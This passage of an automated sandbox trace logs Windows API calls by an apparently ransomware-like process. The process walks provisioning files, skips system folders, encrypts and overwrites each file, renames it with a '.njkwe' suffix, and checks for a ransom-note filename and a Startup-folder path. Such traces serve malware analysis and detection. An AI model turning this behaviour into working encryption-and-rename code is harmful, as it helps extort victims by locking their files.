nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0081.629] GetProcessHeap () returned 0xbe0000 [0081.629] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.629] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.629] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.629] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.629] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.630] CloseHandle (hObject=0x43c) returned 1 [0081.630] GetProcessHeap () returned 0xbe0000 [0081.630] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.630] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0081.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\519__connections_cellular_vinaphone (vietnam)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\519__Connections_Cellular_Vinaphone (Vietnam)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\519__connections_cellular_vinaphone (vietnam)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.630] GetProcessHeap () returned 0xbe0000 [0081.630] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.630] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x902943e8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x902943e8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x902943e8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", cAlternateFileName="51__CO~1.PRO")) returned 1 [0081.630] lstrcmpiW (lpString1="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.630] lstrcmpiW (lpString1="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.631] lstrcmpiW (lpString1="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.631] lstrcmpiW (lpString1="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.631] lstrcmpiW (lpString1="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.631] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml") returned 181 [0081.631] StrStrIW (lpFirst="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.631] lstrcmpW (lpString1="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.631] lstrcmpW (lpString1="51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.631] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\51__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.631] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\51__connections_cellular_eronet bosnia (bosnia and herzegovina)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.631] GetTickCount () returned 0x1154b7c [0081.631] GetTickCount () returned 0x1154b7c [0081.631] GetTickCount () returned 0x1154b7c [0081.631] GetTickCount () returned 0x1154b7c [0081.631] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.631] GetProcessHeap () returned 0xbe0000 [0081.631] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.631] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2e1, lpOverlapped=0x0) returned 1 [0081.633] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.633] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2e1, lpOverlapped=0x0) returned 1 [0081.633] GetProcessHeap () returned 0xbe0000 [0081.633] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.633] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.633] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.633] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.633] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.634] CloseHandle (hObject=0x43c) returned 1 [0081.634] GetProcessHeap () returned 0xbe0000 [0081.634] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.634] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 201 [0081.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\51__connections_cellular_eronet bosnia (bosnia and herzegovina)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\51__Connections_Cellular_Eronet Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\51__connections_cellular_eronet bosnia (bosnia and herzegovina)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.634] GetProcessHeap () returned 0xbe0000 [0081.634] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.634] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ac947, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912ac947, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912ac947, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", cAlternateFileName="520__C~1.PRO")) returned 1 [0081.635] lstrcmpiW (lpString1="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.635] lstrcmpiW (lpString1="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.635] lstrcmpiW (lpString1="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.635] lstrcmpiW (lpString1="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.635] lstrcmpiW (lpString1="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.635] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml") returned 166 [0081.635] StrStrIW (lpFirst="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.635] lstrcmpW (lpString1="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.635] lstrcmpW (lpString1="520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.635] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\520__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.635] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\520__connections_cellular_vms mobifone (vietnam)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.635] GetTickCount () returned 0x1154b7c [0081.635] GetTickCount () returned 0x1154b7c [0081.635] GetTickCount () returned 0x1154b7c [0081.635] GetTickCount () returned 0x1154b7c [0081.635] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.635] GetProcessHeap () returned 0xbe0000 [0081.635] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.636] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0081.647] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.647] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0081.647] GetProcessHeap () returned 0xbe0000 [0081.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.647] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.647] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.647] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.648] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.648] CloseHandle (hObject=0x43c) returned 1 [0081.648] GetProcessHeap () returned 0xbe0000 [0081.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.648] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\520__connections_cellular_vms mobifone (vietnam)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\520__Connections_Cellular_VMS MobiFone (Vietnam)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\520__connections_cellular_vms mobifone (vietnam)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.649] GetProcessHeap () returned 0xbe0000 [0081.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.649] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ac947, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912ac947, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912ac947, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", cAlternateFileName="521__C~1.PRO")) returned 1 [0081.649] lstrcmpiW (lpString1="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.649] lstrcmpiW (lpString1="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.649] lstrcmpiW (lpString1="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.649] lstrcmpiW (lpString1="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.649] lstrcmpiW (lpString1="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.649] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml") returned 164 [0081.649] StrStrIW (lpFirst="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.649] lstrcmpW (lpString1="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.649] lstrcmpW (lpString1="521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.649] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\521__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.649] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\521__connections_cellular_vodafone (worldwide)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.649] GetTickCount () returned 0x1154b8c [0081.649] GetTickCount () returned 0x1154b8c [0081.649] GetTickCount () returned 0x1154b8c [0081.649] GetTickCount () returned 0x1154b8c [0081.650] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.650] GetProcessHeap () returned 0xbe0000 [0081.650] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.650] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0081.651] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.651] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0081.651] GetProcessHeap () returned 0xbe0000 [0081.652] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.652] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.652] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.652] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.652] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.652] CloseHandle (hObject=0x43c) returned 1 [0081.652] GetProcessHeap () returned 0xbe0000 [0081.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.652] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0081.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\521__connections_cellular_vodafone (worldwide)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\521__Connections_Cellular_Vodafone (Worldwide)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\521__connections_cellular_vodafone (worldwide)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.653] GetProcessHeap () returned 0xbe0000 [0081.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.653] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ac947, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912ac947, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912ac947, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="522__C~1.PRO")) returned 1 [0081.653] lstrcmpiW (lpString1="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0081.653] lstrcmpiW (lpString1="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0081.653] lstrcmpiW (lpString1="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0081.653] lstrcmpiW (lpString1="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0081.653] lstrcmpiW (lpString1="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0081.653] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0081.653] StrStrIW (lpFirst="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0081.653] lstrcmpW (lpString1="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.653] lstrcmpW (lpString1="522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0081.653] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\522__Cellular", 